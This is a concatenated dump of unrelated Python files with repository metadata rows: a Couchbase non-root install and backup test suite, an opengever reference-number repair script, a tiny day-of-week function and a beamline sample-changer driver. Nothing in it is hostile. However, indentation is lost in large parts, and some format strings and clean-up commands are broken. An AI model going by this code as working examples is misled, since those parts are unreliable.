        unique_together = (('id', 'ansible_adhoc'),)
class AnsibleModule(models.Model):
    """Catalog of ansible modules that ad-hoc commands can reference."""
    module_name = models.CharField(unique=True, max_length=45)
    module_describe = models.CharField(max_length=45, blank=True, null=True)
    class Meta:
        db_table = 'ansible_module'
        ordering = ['module_name']
| [
"taoprogramer@gmail.com"
] | taoprogramer@gmail.com |
8c7cf55fc4fd423075f5f80507529ff6a80b8058 | e4b54361fe88d25c051e88b65a7c380145358610 | /pytests/nonroottests.py | 5834d2de8613fde36f40f1e56306b3ddf0b5d335 | [] | no_license | saigon/testrunner | 2c7c635271de56323b433e145b2bb10fa30d40b7 | 382ea1c84217ab58fb71f239801c1f2ee13923e0 | refs/heads/master | 2021-01-15T21:25:48.532023 | 2013-08-17T00:32:46 | 2013-08-17T00:41:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,204 | py | import logger
import unittest
import copy
import datetime
import time
import paramiko
import os
from couchbase.cluster import Cluster
from TestInput import TestInputSingleton
from membase.api.rest_client import RestConnection, Bucket
from couchbase.documentgenerator import BlobGenerator, DocumentGenerator
from remote.remote_util import RemoteMachineShellConnection, RemoteUtilHelper
class NonRootTests(unittest.TestCase):
    def setUp(self):
        """Read the test input, clean every node, perform the non-root
        couchbase install on all of them, and give the servers time to
        come up."""
        self.log = logger.Logger.get_logger()
        self.input = TestInputSingleton.input
        self._os = self.input.param("os","null"); #Allow centos, ubuntu, windows
        self.num_items = self.input.param("items", 100000)
        self.servers = self.input.servers
        self.master = self.servers[0]
        self.clean_up()
        self.log.info("Begin setting up the couchbase on all server nodes...")
        self.non_root_install()
        self.log.info("Wait for 30 seconds after couchbase install over all servers...")
        time.sleep(30)
        self.log.info("============== NonRootTests setUp was started ==============")
    def tearDown(self):
        """
        Delete the non-root installation: kill the couchbase-server process
        and remove the unpacked tree and downloaded package on every node.
        """
        self.log.info("============== NonRootTests tearDown was started ==============")
        for server in self.servers:
            shell = RemoteMachineShellConnection(server)
            if self._os == "centos" or self._os == "ubuntu":
                # -k asks the relocated couchbase-server script to kill itself.
                command = "cd /home/{0}/opt/couchbase && ./bin/couchbase-server -k".format(server.ssh_username)
                o, e = shell.execute_non_sudo_command(command)
                shell.log_command_output(o, e)
                o, e = shell.execute_non_sudo_command("rm -rf etc/ opt/ couchbase-server-enterprise_x86_64_2.2.0-772-rel.*")
                shell.log_command_output(o, e)
            else:
                #Handling Windows?
                pass
            shell.disconnect()
def clean_up(self):
self.log.info("Cleaning up nodes, stopping previous couchbase instances if any ..")
for server in self.servers:
shell = RemoteMachineShellConnection(server)
if self._os == "centos" or self._os == "ubuntu":
command = "cd /home/{0}/opt/couchbase && ./bin/couchbase-server -k".format(server.ssh_username)
o, e = shell.execute_non_sudo_command(command)
shell.log_command_output(o, e)
o, e = shell.execute_non_sudo_command("rm -rf etc/ opt/ couchbase-server-enterprise_x86_64_2.2.0-772-rel.*")
shell.log_command_output(o, e)
command = "rm -rf backup/"
shell.log_command_output(o, e)
else:
#Handling Windows?
pass
shell.disconnect()
"""
Method that sets up couchbase-server on the server list, without root privileges.
"""
def non_root_install(self):
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
for server in self.servers:
shell = RemoteMachineShellConnection(server)
info = shell.extract_remote_info()
ssh_client.connect(hostname=server.ip,key_filename=server.ssh_key)
sftp_client = ssh_client.open_sftp()
if self._os == "centos":
command0 = "rm -rf opt/ etc/ && rm -rf couchbase-server-enterprise_x86_64_2.2.0-772-rel.rpm"
command1 = "wget http://builds.hq.northscale.net/latestbuilds/couchbase-server-enterprise_x86_64_2.2.0-772-rel.rpm"
command2 = "rpm2cpio couchbase-server-enterprise_x86_64_2.2.0-772-rel.rpm | cpio --extract --make-directories --no-absolute-filenames"
command3 = "cd /home/{0}/opt/couchbase && ./bin/install/reloc.sh `pwd`".format(server.ssh_username)
command4 = "cd /home/{0}/opt/couchbase && ./bin/couchbase-server -- -noinput -detached".format(server.ssh_username)
command5 = "cd /home/{0}/opt/couchbase && ./bin/couchbase-server -k".format(server.ssh_username)
o, e = shell.execute_non_sudo_command(command0)
shell.log_command_output(o, e)
o, e = shell.execute_non_sudo_command(command1)
shell.log_command_output(o, e)
o, e = shell.execute_non_sudo_command(command2)
shell.log_command_output(o, e)
o, e = shell.execute_non_sudo_command(command3)
shell.log_command_output(o, e)
self.log.info("Starting couchbase server <non-root, non-sudo> ..")
o, e = shell.execute_non_sudo_command(command4)
shell.log_command_output(o, e)
elif self._os == "ubuntu":
command0 = "rm -rf opt/ etc/ && rm -rf couchbase-server-enterprise_x86_64_2.2.0-772-rel.deb"
command1 = "wget http://builds.hq.northscale.net/latestbuilds/couchbase-server-enterprise_x86_64_2.2.0-772-rel.deb"
command2 = "dpkg-deb -x couchbase-server-enterprise_x86_64_2.2.0-772-rel.deb /home/{0}".format(server.ssh_username)
command3 = "cd /home/{0}/opt/couchbase && ./bin/install/reloc.sh `pwd`".format(server.ssh_username)
command4 = "cd /home/{0}/opt/couchbase && ./bin/couchbase-server -- -noinput -detached".format(server.ssh_username)
command5 = "cd /home/{0}/opt/couchbase && ./bin/couchbase-server -k".format(server.ssh_username)
o, e = shell.execute_non_sudo_command(command0)
shell.log_command_output(o, e)
o, e = shell.execute_non_sudo_command(command1)
shell.log_command_output(o, e)
o, e = shell.execute_non_sudo_command(command2)
shell.log_command_output(o, e)
o, e = shell.execute_non_sudo_command(command3)
shell.log_command_output(o, e)
self.log.info("Starting couchbase server <non-root, non-sudo> ..")
o, e = shell.execute_non_sudo_command(command4)
shell.log_command_output(o, e)
self.fail("TODO: Add instructions for ubuntu")
elif self._os == "windows":
self.fail("TODO: Add instructions for windows")
else:
self.fail("Enter valid os name, options: centos, ubuntu, windows; entered name: {0} - invalid.".format(self._os))
ssh_client.close()
"""
Method that initializes cluster, rebalances in nodes, and creates a standard bucket
"""
def init_rebalance_cluster_create_testbucket(self):
shell = RemoteMachineShellConnection(self.master)
if self._os == "centos" or self._os == "ubuntu":
_1 = "cd /home/{0}/opt/couchbase &&".format(self.master.ssh_username)
_2 = " ./bin/couchbase-cli cluster-init -c localhost:8091"
_3 = " --cluster-init-username={0} --cluster-init-password={1}".format(self.master.rest_username, self.master.rest_password)
_4 = " --cluster-init-port=8091 --cluster-init-ramsize=1000"
command_to_init = _1 + _2 + _3 + _4
o, e = shell.execute_non_sudo_command(command_to_init)
shell.log_command_output(o, e)
time.sleep(10)
for i in range(1, len(self.servers)):
_1 = "cd /home/{0}/opt/couchbase &&".format(self.master.ssh_username)
_2 = " ./bin/couchbase-cli server-add -c {1}:8091".format(self.master.ip)
_3 = " --server-add={2}:8091".format(self.servers[i].ip)
_4 = " --server-add-username={3}".format(self.servers[i].rest_username)
_5 = " --server-add-password={4}".format(self.servers[i].rest_password)
_6 = " -u {0} -p {1}".format(self.servers[i].rest_username, self.servers[i].rest_password)
command_to_rebalance = _1 + _2 + _3 + _4 + _5 + _6
o, e = shell.execute_non_sudo_command(command_to_rebalance)
shell.log_command_output(o, e)
time.sleep(10)
if len(self.servers) < 2:
rep_count = 0
else:
rep_count = 1
self.log.info("Cluster set up, now creating a bucket ..")
_1 = "cd /home/{0}/opt/couchbase &&".format(self.master.ssh_username)
_2 = " ./bin/couchbase-cli bucket-create -c localhost:8091"
_3 = " --bucket=testbucket --bucket-type=couchbase --bucket-port=11211"
_4 = " --bucket-ramsize=500 --bucket-replica={0} --wait".format(rep_count)
_5 = " -u {0} -p {1}".format(self.master.rest_username, self.master.rest_password)
command_to_create_bucket = _1 + _2 + _3 + _4 + _5
o, e = shell.execute_non_sudo_command(command_to_create_bucket)
shell.log_command_output(o, e)
time.sleep(30)
elif self._os == "windows":
# TODO: Windows support
pass
"""
Test loads a certain number of items on a standard bucket created
using couchbase-cli and later verifies if the number matches what's expected.
"""
def test_create_bucket_test_load(self):
shell = RemoteMachineShellConnection(self.master)
self.init_rebalance_cluster_create_testbucket()
if self._os == "centos" or self._os == "ubuntu":
self.log.info("Load {0} through cbworkloadgen ..".format(self.num_items))
_1 = "cd /home/{0}/opt/couchbase &&".format(self.master.ssh_username)
_2 = " ./bin/cbworkloadgen -n localhost:8091"
_3 = " -r .8 -i {0} -s 256 -b testbucket -t 1".format(self.num_items)
_4 = " -u {0} -p {1}".format(self.master.rest_username, self.master.rest_password)
command_to_load = _1 + _2 + _3 + _4
o, e = shell.execute_non_sudo_command(command_to_load)
shell.log_command_output(o, e)
time.sleep(20)
rest = RestConnection(self.master)
item_count = rest.fetch_bucket_stats(bucket="testbucket")["op"]["samples"]["curr_items"][-1]
if (item_count == self.num_items):
self.log.info("Item count matched, {0}={1}".format(item_count, self.num_items))
else:
self.fail("Item count: Not what's expected, {0}!={1}".format(item_count, self.num_items))
self.log.info("Deleting testbucket ..");
_1 = "cd /home/{0}/opt/couchbase &&".format(self.master.ssh_username)
_2 = " ./bin/couchbase-cli bucket-delete -c localhost:8091"
_3 = " --bucket=testbucket"
_4 = " -u {0} -p {1}".format(self.master.rest_username, self.master.rest_password)
command_to_delete_bucket = _1 + _2 + _3 + _4
o, e = shell.execute_non_sudo_command(command_to_delete_bucket)
shell.log_command_output(o, e)
time.sleep(10)
elif self._os == "windows":
# TODO: Windows support
self.log.info("Yet to add support for windows!")
pass
"""
Test that loads a certain number of items, backs up, deletes bucket,
recreates bucket, restores, and verifies if count matched.
"""
def test_bucket_backup_restore(self):
shell = RemoteMachineShellConnection(self.master)
self.init_rebalance_cluster_create_testbucket()
if self._os == "centos" or self._os == "ubuntu":
self.log.info("Load {0} through cbworkloadgen ..".format(self.num_items))
_1 = "cd /home/{0}/opt/couchbase &&".format(self.master.ssh_username)
_2 = " ./bin/cbworkloadgen -n localhost:8091"
_3 = " -r .8 -i {0} -s 256 -b testbucket -t 1".format(self.num_items)
_4 = " -u {0} -p {1}".format(self.master.rest_username, self.master.rest_password)
command_to_load = _1 + _2 + _3 + _4
o, e = shell.execute_non_sudo_command(command_to_load)
shell.log_command_output(o, e)
time.sleep(20)
rest = RestConnection(self.master)
ini_item_count = rest.fetch_bucket_stats(bucket="testbucket")["op"]["samples"]["curr_items"][-1]
self.log.info("Backing up bucket 'testbucket' ..")
_1 = "cd /home/{0}/opt/couchbase &&".format(self.master.ssh_username)
_2 = " ./bin/cbbackup http://localhost:8091"
_3 = " /home/{0}/backup".format(self.master.ssh_username)
_4 = " -u {0} -p {1}".format(self.master.rest_username, self.master.rest_password)
command_to_backup = _1 + _2 + _3 + _4
o, e = shell.execute_non_sudo_command(command_to_backup)
shell.log_command_output(o, e)
time.sleep(10)
self.log.info("Deleting bucket ..")
_1 = "cd /home/{0}/opt/couchbase &&".format(self.master.ssh_username)
_2 = " ./bin/couchbase-cli bucket-delete -c localhost:8091"
_3 = " --bucket=testbucket"
_4 = " -u {0} -p {1}".format(self.master.rest_username, self.master.rest_password)
command_to_delete_bucket = _1 + _2 + _3 + _4
o, e = shell.execute_non_sudo_command(command_to_delete_bucket)
shell.log_command_output(o, e)
time.sleep(20)
if len(self.servers) < 2:
rep_count = 0
else:
rep_count = 1
self.log.info("Recreating bucket ..")
_1 = "cd /home/{0}/opt/couchbase &&".format(self.master.ssh_username)
_2 = " ./bin/couchbase-cli bucket-create -c localhost:8091"
_3 = " --bucket=testbucket --bucket-type=couchbase --bucket-port=11211"
_4 = " --bucket-ramsize=500 --bucket-replica={0} --wait".format(rep_count)
_5 = " -u {0} -p {1}".format(self.master.rest_username, self.master.rest_password)
command_to_create_bucket = _1 + _2 + _3 + _4 + _5
o, e = shell.execute_non_sudo_command(command_to_create_bucket)
shell.log_command_output(o, e)
time.sleep(20)
self.log.info("Restoring bucket 'testbucket' ..")
_1 = "cd /home/{0}/opt/couchbase &&".format(self.master.ssh_username)
_2 = " ./bin/cbrestore /home/{0}/backup http://localhost:8091".format(self.master.ssh_username)
_3 = " -b testbucket -B testbucket"
_4 = " -u {0} -p {1}".format(self.master.rest_username, self.master.rest_password)
command_to_restore = _1 + _2 + _3 + _4
o, e = shell.execute_non_sudo_command(command_to_restore)
shell.log_command_output(o, e)
time.sleep(10)
rest = RestConnection(self.master)
fin_item_count = rest.fetch_bucket_stats(bucket="testbucket")["op"]["samples"]["curr_items"][-1]
self.log.info("Removing backed-up folder ..")
command_to_remove_folder = "rm -rf /home/{0}/backup".format(self.master.ssh_username)
o, e = shell.execute_non_sudo_command(command_to_remove_folder)
shell.log_command_output(o, e)
if (fin_item_count == ini_item_count):
self.log.info("Item count before and after deleting with backup/restore matched, {0}={1}".format(
fin_item_count, ini_item_count))
else:
self.fail("Item count didnt match - backup/restore, {0}!={1}".format(fin_item_count, ini_item_count))
self.log.info("Deleting testbucket ..");
_1 = "cd /home/{0}/opt/couchbase &&".format(self.master.ssh_username)
_2 = " ./bin/couchbase-cli bucket-delete -c localhost:8091"
_3 = " --bucket=testbucket"
_4 = " -u {0} -p {1}".format(self.master.rest_username, self.master.rest_password)
command_to_delete_bucket = _1 + _2 + _3 + _4
o, e = shell.execute_non_sudo_command(command_to_delete_bucket)
shell.log_command_output(o, e)
time.sleep(10)
elif self._os == "windows":
# TODO: Windows support
self.log.info("Yet to add support for windows!")
pass
| [
"abhinav.dangeti@gmail.com"
] | abhinav.dangeti@gmail.com |
5ef8097cf66e2db0fa6b7d8d2d11a22a0d3f97e1 | ce75bce747bf60b364bc2e516824fc69c64a7eec | /opengever/maintenance/scripts/archive/04_fix_ai_refnums.py | ede9e2ca2e686c1b7c72846ef4c543e7a57ffdfb | [] | no_license | 4teamwork/opengever.maintenance | c94e470af31f891d0969877533e5acd37369f70f | f2b9866fb6cce1d24e29b084b757eec857119479 | refs/heads/master | 2023-07-28T17:57:09.619138 | 2023-07-14T13:08:20 | 2023-07-14T13:08:20 | 14,493,557 | 2 | 0 | null | 2023-08-31T09:07:21 | 2013-11-18T13:46:30 | Python | UTF-8 | Python | false | false | 6,511 | py | from Acquisition import aq_inner
from Acquisition import aq_parent
from opengever.base.adapters import CHILD_REF_KEY
from opengever.base.adapters import DOSSIER_KEY
from opengever.base.adapters import PREFIX_REF_KEY
from opengever.base.adapters import REPOSITORY_FOLDER_KEY
from opengever.base.interfaces import IReferenceNumberFormatter
from opengever.base.interfaces import IReferenceNumberPrefix
from opengever.base.interfaces import IReferenceNumberSettings
from opengever.dossier.behaviors.dossier import IDossierMarker
from opengever.dossier.templatedossier import ITemplateDossier
from opengever.maintenance.debughelpers import setup_app
from opengever.maintenance.debughelpers import setup_plone
from opengever.repository.interfaces import IRepositoryFolder
from opengever.repository.repositoryroot import IRepositoryRoot
from opengever.task.task import ITask
from plone import api
from plone.registry.interfaces import IRegistry
from zope.annotation.interfaces import IAnnotations
from zope.app.intid.interfaces import IIntIds
from zope.component import getUtility
from zope.component import queryAdapter
import transaction
SEPARATOR = '-' * 78
class ReferenceNumberHelper(object):
    """Helper class for dealing with reference numbers.
    """
    def __init__(self, log_func, site):
        # log_func: callable taking a message string; site: the Plone site.
        self.log = log_func
        self.site = site
    def get_repo_dossier_separator(self, obj=None):
        # Look up the configured reference-number formatter and return the
        # separator it uses between the repository and dossier parts.
        registry = getUtility(IRegistry)
        proxy = registry.forInterface(IReferenceNumberSettings)
        formatter = queryAdapter(obj,
                                 IReferenceNumberFormatter,
                                 name=proxy.formatter)
        return formatter.repository_dossier_seperator
    def get_new_mapping(self, key, obj):
        # Fetch the reference-number mapping stored under `key` in the
        # parent's annotations; the annotation bucket used depends on the
        # object's type.  Returns None when no mapping exists.
        parent = aq_parent(aq_inner(obj))
        ann = IAnnotations(parent)
        if IDossierMarker.providedBy(obj):
            mapping_base = ann.get(DOSSIER_KEY)
        elif IRepositoryFolder.providedBy(obj) or IRepositoryRoot.providedBy(obj):
            mapping_base = ann.get(REPOSITORY_FOLDER_KEY)
        else:
            raise Exception("Unknown object type!")
        if not mapping_base:
            return None
        mapping = mapping_base.get(key)
        return mapping
class ReferenceNumberFixer(object):
"""This is the fix for some previously run fixscripts.
It attempts to fix broken reference numbers. A new reference number has
been generated by mistake while moving content. Some fix-scrips have then
attempted to revert these reference numbers to their previous state. This
seems to have failed in come cases:
The reference numbers are now in an inconsistent state and have different
values in child_mapping and prefix_mapping. This script reverts the
reference numbers to the state as defined in child_mapping. If multiple
values are defined in child_mapping it takes the higher (later) one.
"""
def __init__(self, log_func, site):
self.catalog = api.portal.get_tool('portal_catalog')
self.parent_logger = log_func
self.site = site
self.helper = ReferenceNumberHelper(log_func, site)
self.intids = getUtility(IIntIds)
self.ignored_ids = ['vorlagen']
self.objs_to_reindex = set()
def log(self, msg):
msg = " " + msg
return self.parent_logger(msg)
def _fix_wrong_mappings(self, obj):
"""Detect the following errors:
- entry of reference number in prefix_mapping available
- no entry in child_mapping for that refernece numbers, but for
other (previous) reference numbers for that content object
"""
parent = aq_parent(aq_inner(obj))
local_number = IReferenceNumberPrefix(parent).get_number(obj)
intid = self.intids.getId(obj)
try:
child_mapping = self.helper.get_new_mapping(CHILD_REF_KEY, obj)
prefix_mapping = self.helper.get_new_mapping(PREFIX_REF_KEY, obj)
has_child_mapping = child_mapping.get(local_number) == intid
has_prefix_mapping = prefix_mapping.get(intid) == local_number
is_assigned_a_refnum = intid in set(child_mapping.values())
if not has_child_mapping:
if is_assigned_a_refnum:
self._revert_to_refnum_in_child_mapping(
obj, parent, local_number, intid, child_mapping, prefix_mapping)
else:
self.log("WARNING: obj %s not in child mapping of parent!" % obj)
if not has_prefix_mapping:
self.log("WARNING: obj %s not in prefix mapping of parent!" % obj)
except Exception, e:
self.log("WARNING: '%s' for %s" % (e, obj))
    def _revert_to_refnum_in_child_mapping(self, obj, parent, local_number, intid, child_mapping, prefix_mapping):
        """Revert obj's reference number to the one recorded in child_mapping.

        When several numbers map to obj, the highest (latest) one wins.
        """
        previous_refnums = []
        for key, value in child_mapping.iteritems():
            if value == intid:
                previous_refnums.append(key)
        max_previous_refnum = unicode(max(map(int, previous_refnums)))
        # the erroneously generated number must be newer than any recorded one
        assert int(local_number) > int(max_previous_refnum)
        # revert refnum to previous entry
        prefix_mapping[intid] = max_previous_refnum
        self.log("INFO: reverted %s (%s) from %s to %s" % (obj, intid, local_number, max_previous_refnum))
        assert IReferenceNumberPrefix(parent).get_number(obj) == max_previous_refnum
        # everything below obj now carries a changed reference number -> reindex
        for brain in self.catalog(path='/'.join(obj.getPhysicalPath())):
            self.objs_to_reindex.add(brain.getObject())
    def fix_child_mappings(self):
        """Run the mapping check on every dossier, then reindex what changed."""
        dossier_brains = self.catalog(object_provides=IDossierMarker.__identifier__)
        for brain in dossier_brains:
            obj = brain.getObject()
            if ITemplateDossier.providedBy(obj):
                continue
            if obj.id in self.ignored_ids:
                continue
            self._fix_wrong_mappings(obj)
        for obj in self.objs_to_reindex:
            obj.reindexObject(idxs=['reference'])
            if ITask.providedBy(obj):
                # keep the SQL mirror of tasks in sync with the plone object
                obj.get_sql_object().sync_with(obj)
def main():
    """Entry point: set up the Plone site and run the fixer.

    The transaction is doomed up front, so nothing this script does can be
    committed (i.e. it always runs as a dry run).
    """
    app = setup_app()
    print SEPARATOR
    plone = setup_plone(app, [])
    # prevents erroneous execution
    transaction.doom()
    def log(msg):
        print msg
    fixer = ReferenceNumberFixer(log, plone)
    print "Running 'fixing broken mappings'..."
    fixer.fix_child_mappings()
    print "Done"

if __name__ == '__main__':
    main()
| [
"david.erni@4teamwork.ch"
] | david.erni@4teamwork.ch |
9cb456489d73565f68a676b9d586e0b24fee5b75 | 4486fd77358c3af2f526de28e30455270a5f2626 | /2.7.py | b1b99ae3bcabf7182b74a91105c5645db5b870ea | [] | no_license | genius-2/python-files | 3e8d80e9cfb769edf3508eb531c98e6643b5a7d8 | 72a3dadd228651d5b713c5a2f4c960b2d917039e | refs/heads/master | 2023-02-04T18:29:51.535033 | 2020-12-27T17:45:11 | 2020-12-27T17:45:11 | 299,374,875 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 121 | py | def day(l):
day=(l+1)%7
return day
# Read a day index from stdin, print the following day, then wait for one
# more input line before exiting.
l=int(input())
print(day(l))
print("type 'end' to exit ")
e=str(input())
"noreply@github.com"
] | genius-2.noreply@github.com |
6ba303e63bec1428c6372c304442635b1df11e41 | 596f7d48f5f961234b9f1771fdd055c33f234ddd | /HardwareObjects/SOLEIL/PX1/PX1Cryotong.py | 555fb99408359f44ae49e876406ae19ad694a51c | [] | no_license | schurmann/HardwareRepository | d0cf468c42b04e19e54fdd837074d1fe4ea66a0a | 8ab972c42b89d953b897b9745edec7156b156103 | refs/heads/master | 2020-04-06T23:04:28.098436 | 2018-11-15T16:25:29 | 2018-11-15T16:25:29 | 157,857,021 | 0 | 0 | null | 2018-11-16T11:15:59 | 2018-11-16T11:15:59 | null | UTF-8 | Python | false | false | 10,250 | py |
import logging
import gevent
import time
from HardwareRepository.Command.Tango import DeviceProxy
from Cats90 import Cats90, SampleChangerState
from Cats90 import BASKET_UNIPUCK
from PX1Environment import EnvironmentPhase
class PX1Cryotong(Cats90):
    """CATS-family "Cryotong" sample changer used on the SOLEIL PX1 beamline.

    Extends Cats90 with PX1 specifics: a PX1Environment object that gates
    sample transfers, gripper dry-and-soak handling, and extra Tango
    channels (software authorization, home-opened, countdown, ...).
    """

    __TYPE__ = "CATS"

    default_no_lids = 1
    baskets_per_lid = 3

    default_basket_type = BASKET_UNIPUCK

    def __init__(self, *args, **kwargs):
        super(PX1Cryotong, self).__init__(*args, **kwargs)

        self._safeNeeded = None
        self._homeOpened = None
        self.dry_and_soak_needed = False
        self.count_down = None
        self.soft_auth = None
        self.incoherent_state = None

    def init(self):
        """Connect the Tango channels/commands and the PX1 environment object."""
        super(PX1Cryotong, self).init()

        self.cats_device = DeviceProxy(self.getProperty("cats_device"))

        self.environment = self.getObjectByRole("environment")
        if self.environment is None:
            # without the environment object transfers cannot be driven
            logging.error("PX1Cats. environment object not available. Sample changer cannot operate. Info.mode only")
            self.infomode = True
        else:
            self.infomode = False

        for channel_name in ("_chnSoftAuth", "_chnHomeOpened",
                             "_chnDryAndSoakNeeded", "_chnIncoherentGonioSampleState",
                             "_chnSampleIsDetected", "_chnCountDown"):
            setattr(self, channel_name, self.getChannelObject(channel_name))

        self._chnSoftAuth.connectSignal("update", self._softwareAuthorization)
        self._chnHomeOpened.connectSignal("update", self._updateHomeOpened)
        self._chnIncoherentGonioSampleState.connectSignal("update", self._updateAckSampleMemory)
        self._chnDryAndSoakNeeded.connectSignal("update", self._dryAndSoakNeeded)
        self._chnSampleIsDetected.connectSignal("update", self._updateSampleIsDetected)
        self._chnCountDown.connectSignal("update", self._updateCountDown)

        self._cmdDrySoak = self.addCommand({
            "type": "tango",
            "name": "_cmdDrySoak",
            "tangoname": self.tangoname,
        }, "DryAndSoak")

    # ### CRYOTONG SPECIFIC METHODS ###

    def _softwareAuthorization(self, value):
        """Channel callback: re-emit the software-authorization flag on change."""
        if value != self.soft_auth:
            self.soft_auth = value
            self.emit("softwareAuthorizationChanged", (value,))

    def _updateHomeOpened(self, value=None):
        """Channel callback: re-emit the 'home opened' flag on change."""
        if self._homeOpened != value:
            self._homeOpened = value
            self.emit('homeOpened', (value, ))

    def _updateSampleIsDetected(self, value):
        """Channel callback: forward the sample-detected flag."""
        self.emit('sampleIsDetected', (value, ))

    def _updateAckSampleMemory(self, value=None):
        """Channel callback: auto-acknowledge an incoherent gonio sample state.

        A warning is emitted to the GUI; the first call only records the state.
        """
        if value is None:
            value = self._chnIncoherentGonioSampleState.getValue()

        if value != self.incoherent_state:
            # automatically acknowledge the error. send a warning to the GUI
            if self.incoherent_state is not None:
                logging.getLogger('user_level_log').warning("CATS: Requested Sample could not be loaded.")
                self.emit('loadError', value)
            try:
                self._cmdAckSampleMemory()
            except:
                # NOTE: deliberately best-effort; the acknowledge command may
                # not be configured in the xml
                pass
            self.incoherent_state = value

    def _dryAndSoakNeeded(self, value=None):
        """Channel callback: remember whether a dry-and-soak is required."""
        self.dry_and_soak_needed = value

    def do_dryAndSoak(self):
        """Run a dry-and-soak unless the gripper is home-opened."""
        homeOpened = self._chnHomeOpened.getValue()
        if not homeOpened:
            self._doDrySoak()
        else:
            logging.getLogger('user_level_log').warning("CATS: You must Dry_and_Soak the gripper.")

    def _updateCountDown(self, value=None):
        """Channel callback: re-emit the countdown value on change."""
        if value is None:
            value = self._chnCountDown.getValue()
        if value != self.count_down:
            logging.getLogger("HWR").info("PX1Cats. CountDown changed. Now is: %s" % value)
            self.count_down = value
            self.emit("countdownSignal", value)

    def _doDrySoak(self):
        """
        Launch the "DrySoak" command on the CATS Tango DS

        :returns: None
        :rtype: None
        """
        if self.infomode:
            logging.warning("PX1Cats. It is in info mode only. DrySoak command ignored")
            return
        self._cmdDrySoak()

    def _doSafe(self):
        """
        Launch the "safe" trajectory on the CATS Tango DS

        :returns: None
        :rtype: None
        """
        if self.infomode:
            logging.warning("PX1Cryotong. It is in info mode only. Command 'safe' ignored")
            return

        ret = self.env_send_transfer()
        if not ret:
            logging.getLogger("user_level_log").error("PX1 Environment cannot set transfer phase")
            raise Exception("Cryotong cannot get to transfer phase. Aborting sample changer operation")

        self._executeServerTask(self._cmdSafe, "Safe", states=[SampleChangerState.Ready, SampleChangerState.Alarm])

    # ### (END) CRYOTONG SPECIFIC METHODS ###

    # ### OVERLOADED CATS90 methods ####

    def cats_pathrunning_changed(self, value):
        """Extend Cats90 behavior: dry-and-soak once the path finishes, if needed."""
        Cats90.cats_pathrunning_changed(self, value)
        if self.cats_running is False and self.dry_and_soak_needed:
            self.do_dryAndSoak()

    def _doLoad(self, sample=None, wash=None):
        """Load *sample* after checking power, gripper state and PX1 phase."""
        ret = self.check_power_on()
        if ret is False:
            logging.getLogger("user_level_log").error("CRYOTONG Cannot be powered")
            raise Exception("CRYOTONG Cannot be powered. Aborting sample changer operation")

        ret = self.check_drysoak()
        if ret is False:
            logging.getLogger("user_level_log").error("CRYOTONG Home Open / DryAndSoak not valid for loading")
            raise Exception("CRYOTONG Home Open / DryAndSoak not valid for loading")

        ret = self.env_send_transfer()
        if ret is False:
            logging.getLogger("user_level_log").error("PX1 Environment cannot set transfer phase")
            raise Exception("Cryotong cannot get to transfer phase. Aborting sample changer operation")

        self._doLoadOperation(sample)

        # Check the value of the CATSCRYOTONG attribute dryAndSoakNeeded to warn user if it is True
        dryAndSoak = self._chnDryAndSoakNeeded.getValue()
        if dryAndSoak:
            logging.getLogger('user_level_log').warning("CATS: It is recommended to Dry_and_Soak the gripper.")

        incoherentSample = self._chnIncoherentGonioSampleState.getValue()
        if incoherentSample:
            logging.getLogger("user_level_log").info("CATS: Load/Unload Error. Please try again.")
            self.emit('loadError', incoherentSample)

    def _doUnload(self, sample=None, wash=None):
        """Unload *sample* after checking power and the PX1 transfer phase."""
        ret = self.check_power_on()
        if ret is False:
            logging.getLogger("user_level_log").error("CRYOTONG Cannot be powered")
            raise Exception("CRYOTONG Cannot be powered. Aborting sample changer operation")

        ret = self.env_send_transfer()
        if ret is False:
            logging.getLogger("user_level_log").error("PX1 Environment cannot set transfer phase")
            raise Exception("Cryotong cannot get to transfer phase. Aborting sample changer operation")

        self._doUnloadOperation(sample)

    def check_power_on(self):
        """Power the CATS on if necessary; return True on success, else False."""
        if self._chnPowered.getValue():
            return True

        self._cmdPowerOn()

        timeout = 3
        t0 = time.time()
        while not self._chnPowered.getValue():
            gevent.sleep(0.3)
            if time.time() - t0 > timeout:
                logging.getLogger('HWR').warning("CRYOTONG: timeout waiting for power on")
                break

        # BUG FIX: the condition was inverted ("if powered: return False"),
        # which made every load fail precisely when powering on succeeded.
        if not self._chnPowered.getValue():
            return False

        return True

    def check_drysoak(self):
        """If home-opened, run a dry-and-soak and wait; return True when ready."""
        if self._chnHomeOpened.getValue() is False:
            return True

        self._cmdDrySoak()
        time.sleep(3)

        t0 = time.time()
        wait_n = 0
        while self._isDeviceBusy():
            if wait_n % 10 == 3:
                logging.getLogger('HWR').warning("CRYOTONG: waiting for dry and soak to complete")
            gevent.sleep(0.3)
            wait_n += 1

        if self._isDeviceReady() and self._chnHomeOpened.getValue() is False:
            return True
        else:
            return False

    def env_send_transfer(self):
        """Put the PX1 environment in TRANSFER phase; return True when reached."""
        if self.environment.readyForTransfer():
            return True

        logging.getLogger('user_level_log').warning("CRYOTONG: Not ready for transfer. sending it")
        self.environment.setPhase(EnvironmentPhase.TRANSFER)

        timeout = 10
        t0 = time.time()
        while not self.environment.readyForTransfer():
            gevent.sleep(0.3)
            if time.time() - t0 > timeout:
                logging.getLogger('HWR').warning("CRYOTONG: timeout waiting for transfer phase")
                break
            logging.getLogger('HWR').warning("CRYOTONG: waiting for transfer phase to be set")

        if not self.environment.readyForTransfer():
            return False

        logging.getLogger('HWR').warning("CRYOTONG: ready for transfer now")
        return True

    # ### (END) OVERLOADED CATS90 methods ####
def test_hwo(hwo):
    """Manual smoke test: dump basket/sample/state info for a cryotong HWO."""
    import gevent
    basket_list = hwo.getBasketList()
    sample_list = hwo.getSampleList()
    print("Baskets/Samples in CATS: %s/%s" % ( len(basket_list), len(sample_list)))
    gevent.sleep(2)
    sample_list = hwo.getSampleList()
    print "No of samples is ", len(sample_list)
    # report the first loaded sample, if any
    for s in sample_list:
        if s.isLoaded():
            print "Sample %s loaded" % s.getAddress()
            break
    if hwo.hasLoadedSample():
        print "Currently loaded (%s): %s" % (hwo.hasLoadedSample(),hwo.getLoadedSample().getAddress())
    print "\nCATS model is: ", hwo.cats_model
    print "CATS state is: ", hwo.state
    print "Sample on Magnet : ", hwo.cats_sample_on_diffr()
    print "All lids closed: ", hwo._chnAllLidsClosed.getValue()
    print "Sample Changer State is: ", hwo.getStatus()
    # basket numbering is 1-based for tool_for_basket
